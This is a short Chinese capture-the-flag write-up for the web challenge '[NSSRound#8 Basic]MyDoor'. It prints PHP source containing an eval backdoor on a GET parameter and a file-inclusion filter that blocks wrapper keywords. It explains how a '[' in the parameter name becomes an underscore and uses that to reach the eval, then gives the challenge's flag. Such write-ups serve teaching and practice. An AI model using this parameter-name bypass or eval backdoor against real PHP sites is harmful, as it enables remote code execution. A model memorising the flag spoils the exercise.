0%

[NSSRound#8 Basic]MyDoor

2025-08-07 20:00By
pureboy010
RCEPHPPHP伪协议

Problem: [NSSRound#8 Basic]MyDoor

思路

  • 解题大致思路
    进入一看后缀就是文件获取

EXP

error_reporting(0);

if (isset($_GET['N_S.S'])) {

eval($_GET['N_S.S']);

}

if(!isset($_GET['file'])) {

header('Location:/index.php?file=');

} else {

$file = $_GET['file'];



if (!preg_match('/\.\.|la|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {

    include $file;

} else {

    die('error.');

}

}

下划线被屏蔽,利用PHP特性,[会转化为下划线
http://node5.anna.nssctf.cn:24262/index.php?N[S.S=phpinfo();
找FLAG
NSSIMAGE

总结

  • 对该题的考点总结
    NSSCTF{63767332-a7d7-4045-9362-55652f16f99e}
还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论
文章信息
板块WEB
作者
pureboy010
目录导航